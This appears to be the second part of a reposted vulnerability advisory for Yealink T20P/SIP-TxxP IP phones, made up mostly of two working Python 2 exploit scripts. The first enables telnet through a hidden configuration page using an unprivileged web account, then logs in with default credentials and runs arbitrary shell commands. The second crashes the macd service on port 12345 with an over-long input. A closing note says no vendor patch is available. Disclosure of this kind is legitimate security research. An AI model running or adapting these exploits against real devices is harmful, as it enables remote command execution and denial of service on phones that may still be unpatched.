T20P IP phone hidden page security bypass vulnerability (2)

# Continuation of the Python 2 script from part (1) of this post: phoneUrl,
# webUser, webPass, phoneIP, telnetUser, telnetPass and shellCmd are set by
# the argument handling shown there. The imports are added here so that this
# fragment is complete on its own.
import urllib
import urllib2
import telnetlib

# Authenticate to the phone's web interface with the low-privilege "user" account.
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, phoneUrl, webUser, webPass)
authhandler = urllib2.HTTPBasicAuthHandler(passman)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)

# PAGEID=10 selects the hidden page; CONFIG_DATA is the configuration blob that
# switches telnet on, sent verbatim from the original advisory script. The hidden
# page accepts the POST from the unprivileged account.
post_params = urllib.urlencode([("PAGEID", "10"), ("CONFIG_DATA", "1%261%261%261%260%261%261%260%261%261%260%26%260%260%260%260%260%261%261%260%260")])

print "[*] Enable telnet on [ %s ] by posting directly to the hidden page with PAGEID=10 parameter as unprivileged user [ user ]" % phoneUrl
pagehandle = urllib2.urlopen(phoneUrl, post_params)

# Telnet is now listening; log in with the phone's default telnet credentials.
print "[*] Making telnet connection to [ %s ] with default user [ %s ] and password [ %s ]" % ( phoneIP, telnetUser, telnetPass )
tn = telnetlib.Telnet(phoneIP)

tn.read_until("IPPHONE login: ")
tn.write(telnetUser + "\n")
if telnetPass:
    tn.read_until("Password: ")
    tn.write(telnetPass + "\n")

# Wait for the shell prompt, run the requested command and print its output.
tn.read_until("$")
print "[*] Executing shell command [ %s ]" % shellCmd
tn.write( shellCmd + '\n' )
tn.read_until( shellCmd )          # skip the echoed command line
print tn.read_until("$").strip("$ ")
tn.write("exit\n")
tn.read_all()


 [0x04] - Remote "/yealink/bin/macd" buffer overflow crash PoC

The following PoC crashes the "/yealink/bin/macd" process, which listens on TCP port 12345, by sending it a single over-long line.

#!/usr/bin/python
# Python 2 crash PoC: one over-long line sent to macd is enough to take the process down.

import socket,sys,time,struct

if len(sys.argv) < 2:
    print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 /yealink/bin/macd remote buffer overflow crash PoC - xistence (xistence<[at]>0x90.nl) - 2012-12-21"
    print "[-] Usage: %s <target addr> " % sys.argv[0]
    sys.exit(0)

target = sys.argv[1]

# Optional second argument; accepted but not used by this PoC.
if len(sys.argv) > 2:
    platform = sys.argv[2]

# 75 bytes of 'A' overrun the buffer macd reads the line into.
buffer = "\x41"*75

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,12345))
except socket.error:
    print "[-] Connection to "+target+" failed!"
    sys.exit(0)

print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 /yealink/bin/macd remote buffer overflow crash PoC - xistence (xistence<[at]>0x90.nl) - 2012-12-21"
print "[*] Sending " + str(len(buffer)) + " byte crash"

s.send(buffer + "\r\n")
s.recv(1024)     # no reply is expected; a reset here is consistent with macd having crashed
s.close()

Recommendations:
--------------------------------------------------------------------------------
Vendor patch:

yealink
-------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

?ProductsID=64&CateID=187&flag=142

Content copyright notice: unless otherwise stated, articles are original to this site.

When reprinting, cite the source: https://www.heiqu.com/wygjgz.html